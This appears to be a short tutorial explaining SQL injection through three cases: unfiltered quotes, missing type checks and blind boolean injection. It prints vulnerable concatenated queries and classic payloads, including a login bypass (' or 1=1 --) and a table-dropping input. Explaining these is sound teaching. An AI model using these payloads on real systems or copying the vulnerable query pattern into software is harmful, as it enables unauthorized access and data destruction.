Reason 1:Incorrectly filtered escape charactersIn this case, the developer fails to filter the input for escape characters and He directly pass the input to SQL statement. This results in vulnerability.
Consider this code:
statement = "SELECT * FROM `users` WHERE `name` = '" + userName + "';"
This code will check the username in datbase. An attacker can use malicious codes to inject his own query. for eg:
' or 1=1he can enter the above code instead of the username. So the SQL statement will become like this:
SELECT * FROM `users` WHERE `name` = '' OR 1=1;
He can use the comments to block the rest of the query .
' or 1=1 --so the query will become like this:
SELECT * FROM `users` WHERE `name` = '' OR 1=1 -- ;
Here name=' ' is false. But '1'='1' is true. Here we used OR operator. So it is enough to one condition is true. So this will query bypass the login.
Reason 2:Incorrect Type HandlingWhen the developer fails to check for the data type of input, it will raise the Vulnerability of Database.
Let us consider this query.
Statement=”Select * from `userid` where `id`=”+inputId+”;” ;
Here Id refers a number data. But the inputId is given directly without checking for the type. So attacker can enter any type of data, he can enter a string.
For example if he input as
1; drop table `userid`;
The query will become as
Select * from `userid` where `id`=1; drop table `userid`;
Reason 3: Blind SQL Injection(Condtion Response)
Blind SQL Injection is used when a web application is vulnerable to an SQL injection but the results of the injection are not visible to the attacker.
The page with the vulnerability may not be one that displays data but will display differently depending on the results of a logical statement injected into the legitimate SQL statement called for that page.
This type of attack can become time-intensive because a new statement must be crafted for each bit recovered. There are several tools that can automate these attacks once the location of the vulnerability and the target information has been established
SELECT `booktitle` FROM `booklist` WHERE `bookId` = 'OOk14cd' AND '1'='1';
will result in a normal page while
SELECT `booktitle` FROM `booklist` WHERE `bookId` = 'OOk14cd' AND '1'='2';
will likely give a different result if the page is vulnerable to a SQL injection
Using this , an attacker can find the column and full datbase details.